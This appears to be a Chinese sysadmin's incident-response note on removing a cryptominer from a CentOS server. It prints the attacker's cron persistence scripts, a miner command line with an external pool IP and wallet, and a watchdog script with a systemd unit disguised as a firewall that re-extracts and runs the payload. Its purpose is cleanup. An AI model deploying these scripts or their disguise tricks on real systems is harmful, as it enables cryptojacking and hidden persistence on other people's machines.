公司服务器被挖矿了,idc处理也没处理干净,登陆服务器查看还是有残留的任务。
[root@nfs ~]# crontab -l
@daily /dev/shm/.lr/1
@reboot /dev/shm/.lr/run > /dev/null 2>&1 & disown
@monthly /dev/shm/.lr/run > /dev/null 2>&1 & disown
#确认服务器ps未被修改
[root@nfs ~]# rpm -qf `which ps`
procps-ng-3.3.10-23.el7.x86_64
#检查文件完整性
[root@nfs ~]# rpm -V procps-ng
查看定时任务中脚本的内容
[root@nfs ~]# cat /dev/shm/.lr/1
#!/bin/bash
#made by Maz4id#1363
locatie=$(cat /tmp/.SQL/.db)
if ! pgrep -x syst3md >/dev/null; then
$locatie/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4 > /dev/null 2>&1 & disown $*
else
:
fi
[root@nfs ~]# cat /dev/shm/.lr/run
#!/bin/bash
#made by Maz4id#1363
if [ $# != 1 ]; then
echo " usage: $0 > /dev/null 2>&1 & disown"
fi
locatie=$(cat /tmp/.SQL/.db)
if [ -f /tmp/.SQL/.db ]; then
:
else
if [ -d /tmp/.SQL ]; then
echo $(pwd) > /tmp/.SQL/.db
else
mkdir /tmp/.SQL
echo $(pwd) > /tmp/.SQL/.db
fi
fi
crontabcalumea() {
if ! crontab -l | grep -q 'run'; then
rm -rf $(cat /tmp/.SQL/.db)/.tempo
echo "@daily $(cat /tmp/.SQL/.db)/1" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
echo "@reboot $(cat /tmp/.SQL/.db)/run > /dev/null 2>&1 & disown" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
echo "@monthly $(cat /tmp/.SQL/.db)/run > /dev/null 2>&1 & disown" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
crontab $(cat /tmp/.SQL/.db)/.tempo
sleep 1
rm -rf $(cat /tmp/.SQL/.db)/.tempo
fi
}
sleep 5
while :
do
$(cat /tmp/.SQL/.db)/1
crontabcalumea
sleep 5
done
可以看到脚本在服务器删创建隐藏的文件夹并向外部ip发送信息。这是先删除脚本中涉及的路径
[root@nfs ~]# rm -rf /tmp/.SQL/.db /tmp/.SQL /dev/shm/.lr/
#结束syst3md进程
[root@nfs ~]# ps aux|grep syst3md
root 8897 0.6 31.2 2617096 1210876 ? Sl 6月11 695:26 /dev/shm/.lr/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4
[root@nfs ~]# kill -9 8897
[root@nfs ~]# ps aux|grep syst3md
root 30940 0.0 0.0 112824 980 pts/0 R+ 09:02 0:00 grep --color=auto syst3md
#清理crontab任务
[root@nfs ~]# crontab -l
#清理之后任务又出现了
[root@nfs ~]# crontab -l
@daily /1
@monthly /run > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
#查看/var/log/message日志
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 15 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行15: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 19 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行19: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: Failed to start with command1 and command2.
Aug 28 09:05:34 nfs Diskutilization: Checking if it's a directory problem
Aug 28 09:09:36 nfs systemd: blrvdlm.service: main process exited, code=killed, status=9/KILL
Aug 28 09:09:37 nfs systemd: Unit blrvdlm.service entered failed state.
Aug 28 09:09:37 nfs systemd: blrvdlm.service failed.
#上面提示的/usr/bin/blrvdlm.sh脚本,查看内容
[root@nfs ~]# cat /usr/bin/blrvdlm.sh
#!/bin/bash
#Blr va da la muie lachetilor <3
# Set the name of the process to check for
process_name="syst3md"
location="/dev/shm/.lr"
# Check if the process is running
while :
do
if ps aux | grep -v grep | grep "syst3md" > /dev/null; then
echo "Firewall is running."
sleep 10
else
echo "Firewall is not running. Starting it now..."
sleep 10
cd /dev/shm/.lr ; ./r
# Try to execute commands to start the process
if
cd /dev/shm/.lr ; ./r
then
echo "Successfully started ."
sleep 10
else
echo "Failed to start with command1 and command2."
echo "Checking if it's a directory problem"
sleep 10
# Verify if a directory exists or not
if [ -d /dev/shm/.lr/run ]
then
echo "Directory exists."
else
echo "Directory does not exist."
echo "Loading payload!"
rm -rf /dev/shm/.lr ; cp /tmp/.../.lr.zip /dev/shm/ ; cd /dev/shm ; unzip .lr ; rm -rf .lr.zip ; cd .lr ; chmod +x * ; ./r
sleep 60
fi
fi
fi
done
上面日志中还涉及了blrvdlm.service服务,查看服务
[root@nfs ~]# systemctl status blrvdlm.service
● blrvdlm.service - Linux Firewall Execution
Loaded: loaded (/etc/systemd/system/blrvdlm.service; disabled; vendor preset: disabled)
Active: active (running) since 一 2023-08-28 09:10:07 CST; 1min 10s ago
Docs: https://lfdblr.com/
Main PID: 707 (blrvdlm.sh)
Tasks: 2
Memory: 308.0K
CGroup: /system.slice/blrvdlm.service
├─707 /bin/bash /usr/bin/blrvdlm.sh
└─799 sleep 60
#停止并删除上面的进程
[root@nfs ~]# systemctl stop --now blrvdlm.service
#查看服务文件内容
[root@nfs ~]# cat /etc/systemd/system/blrvdlm.service
[Unit]
Description=Linux Firewall Execution
Documentation=https://lfdblr.com/
[Service]
Type=simple
User=root
Group=root
TimeoutStartSec=0
Restart=on-failure
RestartSec=30s
#ExecStartPre=
ExecStart=/usr/bin/blrvdlm.sh
SyslogIdentifier=Diskutilization
#ExecStop=
[Install]
WantedBy=multi-user.target
#结束blrvdlm.sh并删除对应文件
[root@nfs ~]# rm -rf /etc/systemd/system/blrvdlm.service
[root@nfs ~]# ps aux|grep "blrvdlm.sh"
root 549 0.0 0.0 112824 992 pts/0 S+ 09:09 0:00 grep --color=auto blrvdlm.sh
root 1499 0.0 0.0 114004 1392 ? Ss 6月11 38:31 /bin/bash /usr/bin/blrvdlm.sh
[root@nfs ~]# kill -9 1499
[root@nfs ~]# rm -rf /usr/bin/blrvdlm.sh
#查看定时任务中的sh是否有未结束的进程
[root@nfs ~]# ps aux|grep -Ei ".lr/1|.lr/run"
root 927 0.0 0.0 113792 1428 ? S 7月01 74:25 /bin/bash /dev/shm/.lr/run
root 2137 0.0 0.0 112824 1016 pts/0 R+ 09:16 0:00 grep --color=auto -Ei .lr/1|.lr/run
root 25379 0.0 0.0 113792 1940 ? S 8月01 34:36 /bin/bash /dev/shm/.lr/run
#停止进程
[root@nfs ~]# kill -9 927 25379
#清除定时任务后再次查看,挖矿脚本已彻底删除
[root@nfs ~]# watch -n 2 "crontab -l"